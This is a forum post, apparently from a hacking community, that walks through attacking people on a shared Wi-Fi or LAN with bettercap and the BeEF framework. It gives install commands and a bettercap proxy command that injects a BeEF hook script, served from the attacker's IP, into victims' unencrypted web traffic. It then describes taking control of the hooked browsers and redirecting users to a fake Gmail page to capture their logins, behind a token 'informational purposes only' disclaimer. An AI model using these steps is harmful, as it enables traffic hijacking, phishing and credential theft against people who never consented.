Mutt
Professional
- Messages
- 1,167
- Reaction score
- 835
- Points
- 113
This article was created for informational purposes only and does not call for action!
We need:
- Kali Linux
- beef-xss framework
- bettercap
Install bettercap on Kali Linux:
Code:
apt install build-essential ruby-dev libpcap-dev net-tools
gem install bettercapBeef is already installed in Kali. Run beef (Login: beef, password: beef):
Code:
service beef-xss startIf there are problems with authorization, run from the folder:
Code:
cd / usr / share / beef ./beefWe connect to any Wi-Fi network (Works in LAN too)
Launch bettercap:
Code:
bettercap --proxy --proxy-module injects --js-url "http://192.168.57.128:3000/hook.js"We indicate your ip (Why not localhost, I think it's clear)
This is where the beef script is injected. We reduce traffic, adjust to the request, embed the script and send it back to the person who made the request.
Works if a person visits the page without ssl, that is, via the http protocol. As soon as he closes the page, the connection with him disappears.
All zombie browsers that beef picked up will appear in the menu on the left.
While they are online, you can use various modules and exploits on them.
Beef contains many modules. You just have to choose the right attack vectors for your attack vectors.
It all depends on the browser and what security contexts it is in. Each context can provide a set of unique attack vectors.
For example, you can direct the user to a fake gmail. Select the required module, click execute. A zombie user will be redirected to a fake. If he enters his username and password, they will be displayed in our panel.
